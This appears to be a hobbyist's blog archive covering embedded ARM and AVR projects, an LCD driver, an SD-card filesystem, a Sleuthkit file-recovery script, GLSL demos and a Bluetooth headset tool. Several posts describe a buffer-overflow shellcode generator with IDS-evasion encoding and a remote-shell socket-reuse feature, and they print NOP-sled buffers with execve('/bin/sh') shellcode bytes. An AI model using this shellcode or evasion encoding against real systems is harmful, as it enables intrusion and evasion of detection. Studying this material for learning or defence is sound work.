Got my Nokia 6100 LCD working. Long story of failures. First try was a LCD with a Epson controller from ebay for 10 Euros. But somehow someone failed to solder the smd socket proberly and it went a way 😉 ( thx max ) .

Next try was a Epson based LCD including a header board from sparkfun . But this time i wasn’t able to run some demo code which was made for the LPC2138 on my LPC2148. I think the board was to fast to talk to the display. I wasn’t able set up SPI on the LPC2148 correct. Need more investigation on that topic.

So i gave up at this point and decided to go for a atmega16. I did a devel board for that which is losy based on this schematics. The boads uses simple parport icsp and has a serial line for debugging and sending data.

Finally i threw some code together using the init commands found in this project. Added support for receiving images via uart and wrote an little python client for sending images.

Future plans are to port the glcd lib to the epson based lcd.

pic1 pic2

download source

Found a LPC2138 port of the Embedded Filesystems Library. Took this stuff and made this working on my LPC2148.

Now i can access an SD-Card attached to the LPC2148. Currently the FAT filesystem is supported. The sample pgramm includes an minimal serial line shell which supports file reading and directoy listings.

MMC/SD Card Filesystem Test (P:LPC2148 L:EFSL)
CARD init...spiInit for SSP/SPI1
Card is initialising.
CSD: 00 26 00 32 5F 59 83 C8 BE FB CF FF 92 40 40 D7
Drive Size is 1015808000 Bytes (1984000 Sectors)
Init done...
Press Command: d r a 
You pressed : d
Directory of 'root':
TEST01      ( 6 bytes )
TEST02      ( 6 bytes )
TEST03      ( 6 bytes )
TEST04      ( 6 bytes )
TEST05      ( 6 bytes )
TEST06      ( 6 bytes )
TEST09      ( 6 bytes )
TEST10      ( 6 bytes )
LOGDAT9 TXT ( 833 bytes )
DUMMY   LOG ( 2754 bytes )

download source

Just got my ARM LPC2148 Dev Board from Olimex

I put together a small overview how to get things working using a linux host system.

Toolchain

  • GNU Compiler Toolchain
  • Serial Programmer
  • Sample Code

  • Crt0
  • Linkerscript
  • Init Routine
  • Simple IO Test
  • SIO Debug Console
  • GNU Compiler Toolchain

    I use a standard arm GNU toolchain. Actuallay found this binary download from mikrocontroller.net. But also my GBA Toolchain worked and produced good binaries. So a Gentoo ARM Crossdev should to the work. Think that the LPC is not too picky about that.

    Serial Programmer

    I tried lpc21isp but it didn’t work for me. So i ended up using lpc2k_pgm. It has little gui and where you can setup all needed configs. I use iHex format to upload to the dev board, where i had best results using quite slow sio speed like 9600bps. You have to enable BSL on the LPC2148 for ICSP. On my LPC the switch is called ‘ICSP1’ which needs to be set into ON position.

    Crt0

    Nothing special about that. Took it from similar LPC based projects.Just setup stack sizes and default IRQ vectors. Worked out of the box.

    Linkerscript

    Tooks this from a other LPC project. The script specifies the memory layout of the target system and defines the sections for the binary output.

    Init Routine

    Code found in startup.c does the PLL init. The LPC2148 has 12 Mhz internal crystal but can run up to 60Mhz when setting the PLL. Also the default IRQ Handlers are defined here.

    Simple IO Test

    I used the on-board leds for a simple IO test.

    
    int main(void)
    {
        unsigned int i;
        Initialize();
        ConsoleInit(60000000 / (16 * BAUD_RATE));
        puts("Init done\n");
        IODIR0 |= 1 < < 10;          // P0.10 is an output
        IODIR0 |= 1 << 11;          // P0.10 is an output
        IOSET0 = 1 << 10;           //LED off
        IOSET0 = 1 << 11;           //LED off
    
        while (1) {
            for (i = 0; i < 1000000; i++);
            IOSET0 = 1 << 10;       //LED off
            IOCLR0 = 1 << 11;       //LED on
            puts("led1: off  led2: on\n");
            for (i = 0; i < 1000000; i++);
            IOCLR0 = 1 << 10;       //LED on
            IOSET0 = 1 << 11;       //LED off
            puts("led1: on   led2: off\n");
        }
    }
    

    SIO Debug Console

    Addes a little module that uses one of the two serial line for debugging output. I use the same serial port as for for the ICSP, so after the flashing lpc2k_gpm will display the output directly without any setup changes.

    pic1 pic2 pic3

    download source

    For a PSP project i need to convert a font to texture. Found a good working program here. But the current version seems to be not maintained anymore. So i did some bugfixes and made it compile against current WX Widget libs. Also i add a new feature that the fontface info is written to c source file, that can be used directly in your project.

    pic1

    Source

    Wrote a little Bash script using Sleuthkit tools to recover a deleted file from a partion. Tested the script with ext2 and fat32 filesystems.

    Setup a test image:

    dd  if=/dev/zero of=image  bs=1k count=8192
    mkfs.ext2 image
    mount -o loop image /mnt/image
    cp something /mnt/image
    rm /mnt/image/something
    sync
    umount /mnt/image

    Now you can start the script to find a token of the deleted file:

    ./find.sh image “Test”

    The Code for find.sh

    #!/bin/sh
     
    IMAGE=$1
    TOKEN=$2
    BSIZE=1024
    TYPE="linux-ext2"
    TMP="dls_$(date +%Y%d%m_%H%M%S)"
     
    if [ $# -ne 2 ]
    then
        echo "Usage: $0 image token"
        exit -1
    fi
     
    if [ ! -f $IMAGE ]
    then
      echo "Cannot find $IMAGE"
      exit -1
    fi
     
    if [  -z "$TOKEN" ]
    then
      echo "Pleae give search token"
      exit -1
    fi
     
    echo "--------------------------"
    echo "Found deleted"
    fls -f $TYPE -rd $IMAGE
    dls -f $TYPE $IMAGE > $TMP
    strings -t d $TMP > $TMP.str
    echo "--------------------------"
    grep -i "$TOKEN" $TMP.str
    echo "--------------------------"
    echo -en "Select Offset:"
    read n
    ADDR=$(grep -i "$TOKEN" $TMP.str | grep "$n" |  sed 's/^[ \t]*//' | head -n 1 | cut -d " " -f1)
    if [ -z "$ADDR" ]
    then
        echo "Nothing found for '$TOKEN'"
        exit -1
    fi
    echo "Found $ADDR"
    OFFSET=$(echo "$ADDR / $BSIZE" | bc)
    echo "Using Offset $OFFSET"
    BLOCK=$(dcalc -f $TYPE  -u $OFFSET  $IMAGE)
    echo "Using Block $BLOCK"
    echo "----------------------------"
    dcat -f $TYPE  $IMAGE  $BLOCK
    echo
    echo "----------------------------"
    INODE=$(ifind -f $TYPE  $IMAGE -d $BLOCK)
    echo "Found Inode $INODE"
    istat -f $TYPE $IMAGE $INODE
    BLOCKS=$(istat -f $TYPE $IMAGE $INODE | tail -n 1)
    echo "---------------------------"
    echo "Found Blocks $BLOCKS"
    echo "---------------------------"
    (for BLOCK in $BLOCKS
    do
       dcat -f $TYPE  $IMAGE  $BLOCK
    done) | tee $TMP.found
    echo "---------------------------"
    echo "Saved to $TMP.found"
    echo "---------------------------"
    rm -f $TMP $TMP.str

    Made a nice shellcode using the python inlineEgg library. The shellcode is designed to smash the stack of a programm which is listen on a socket. The read buffer gets overflowed by the shellcode. The code was tested an on older SUSE9.0, because current disto use pie and ssp

    Features:

    • Python script that generates the shellcode
    • Re-uses the listen socket of the victim and connects it to new shell
    • Scans for correct fd and peername
    • Embedded Telnet client which connects to created remote shell
    • Encoder to generate polymorph shellcode

      Download

    Updated my shellcode generation tool. Added shellcode encryption, to hide from IDS which scan for well known strings in the shellcode, like ‘/bin/sh’. The encryption is quite simple, just add,sub,xor or move by an fixed offset. The tool added also a hook to decode the shellcode before it gets called.

    Changelog:

    • Use getopt for command line parsing
    • Fixed off by one bug in hex dump output
    • Added simple shellcode encryption
    
    ./mkbuffer -m gen -l 256 -c xor -o 2 -f CODE -e CODE
    ------------------------------------------------------
    Start: 0x0x80499a0
    End:   0x0x80499c9
    Len:   0x0029 (41 bytes)
    jump:  0x00000000
    ------------------------------------------------------
    Crypt Shellcode 'xor' offset='2'
    ------------------------------------------------------
    0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:eb 11 5e 31 c9 b1 36 80 74 0e ff 02 80 e9 01 75
    0x0075:f6 eb 05 e8 ea ff ff ff 33 c2 b2 44 33 d9 33 cb
    0x00cb:cf 82 e9 12 59 33 c2 8a 41 05 52 51 8b e3 b2 09
    0x0009:33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a
    0x006a:5a 92 92 92 57 8b e7 55 54 33 f4 51 ea 8c 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    ------------------------------------------------------
    Writing Shellcode to 'CODE'
    ------------------------------------------------------
    Starting Subshell
    setup env $CODE
    ------------------------------------------------------
    
    
    

    Download

    Found some time to play with GLSL Extension. I started with a simple Cube Demo from NeHe using SDL for the user interface programming. Then i added GLEW as the GLSL extension wrapper. The Shader Programs are taken from Linux Magazin Article. Currently no own ideas 🙂 First i had to refresh my OpenGL basics. So i added some switches to trigger Alpha Blending and different textures.

    When running the demo you press following keys to trigger different effects:

    • ‘l’ to toggle Light
    • ‘b’ to enable Alpha Blend
    • ‘f’ to step through NEAREST, LINEAR and MIPMAP textures
    • ‘s’ toggle current Shader Programm
    • ‘n’ switch to different Shader Programms

    Use the mouse and the left button to rotate the cube. The right button and mouse motion to zoom into the scene. The code was tested with a Nvida GT6800 card. You’ll need nvidia GL library, Glew and SDLlib to build it from sources.

    Toonshading

    glsl

    Deformation

    glsl

    Mipmapped Texture

    glsl

    Source

    Inspired by an article in german Hakin9 Magazin from October 2005, i wrote a little programm to test and generate shellcode.A good place to learn about buffer overflows is here. I found a interesting python framwork called inlinegg for shellcode generating. This make shellcode developing really easy and effective.

    My simple tool is used to prepare buffers with shellcode.The actual asm code is done with nasm and linked a against a gcc main programm. The programm has three modes: dump, exec and gen.

    Dump does a hexdump of the plain shellcode, usefull when tracing null bytes.

    For testing the functionality of the shellcode you can use exec which simple calls the shellcode like function.

    Gen is used to build a buffer with the actual shellcode. The code is hexdumped to stdout, raw code it written to stderr and also the enviroment var $CODE is set. Also the target buffer size and stack jump address as to be passed to the program. The buffer ist first filled with the jump address and then the first half with NOPs overwritten. The shellcode gets copied to the middle of the buffer.

    
    ./mkbuffer gen 256  0x1234567
    Start: 0x0x8048bb0
    End:   0x0x8048bd9
    Len:   0x29 (41 bytes)
    jump:  0x1234567
    90
    0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0010:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0020:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0030:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0040:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0050:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0060:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
    0x0070:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31
    0x0080:c0 b0 46 31 db 31 c9 cd 80 eb 10 5b 31 c0 88 43
    0x0090:07 50 53 89 e1 b0 0b 31 d2 cd 80 e8 eb ff ff ff
    0x00a0:2f 62 69 6e 2f 73 68 58 45 23 01 67 45 23 01 67
    0x00b0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
    0x00c0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
    0x00d0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
    0x00e0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
    0x00f0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01
    setup env $CODE
    
    
    
    

    Download

    A new Kbtsco release is available. Did some small tweaks.

    • Added Channel Forcing via Configure Menu. Some people reported having problems with the channel auto dedection, so that it’s now possible to asign the channel manually.
    • Added Cancel Menu item to interrupt the connect process, in case somebody hits the Connect button when no headset is available.
    • Switched Build System from Autotools to bksys.

    Download